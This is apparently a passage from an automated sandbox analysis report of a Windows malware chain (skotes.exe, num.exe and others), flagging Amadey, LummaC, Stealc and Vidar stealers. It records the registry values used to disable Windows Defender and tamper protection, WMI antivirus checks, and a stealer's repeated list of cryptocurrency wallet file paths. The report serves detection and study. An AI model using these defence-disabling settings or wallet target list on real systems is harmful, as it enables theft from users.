Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001608001\num.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001608001\num.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_6C6EA8DC

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C638390 NSS_GetVersion,

6_2_6C638390

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1	Jump to behavior

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe

Registry value created: TamperProtection 0

Jump to behavior

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations	Jump to behavior

AV process strings found (often used to terminate AV products)

Source: file.exe, 00000000.00000003.1804551591.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1803782267.0000000001762000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2679740158.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2679872319.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883449383.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2830596978.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2842380759.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2823881110.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2844205318.0000000005A99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.1872745681.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1810944593.0000000005E14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dows Defender\MsMpeng.exe
Source: file.exe, file.exe, 00000000.00000003.1872781247.0000000001762000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001762000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 33.2.C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.skotes.exe.490000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.6IF65DE3AL7UEH5E4W09DIZ.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2308287602.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2100193708.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2906938578.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2140947944.0000000000491000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2950501488.0000000000E31000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2031756029.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2119358992.0000000000F41000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 32.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.3015827110.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2750222076.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2901676931.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3019501243.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2852632926.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2709864138.0000000005560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.2857203948.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2142029213.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Wallets/Electrum
Source: file.exe	String found in binary or memory: Wallets/ElectronCash
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe	String found in binary or memory: window-state.json
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.conf.json
Source: file.exe, 00000000.00000003.1786821317.0000000001774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe	String found in binary or memory: ExodusWeb3
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
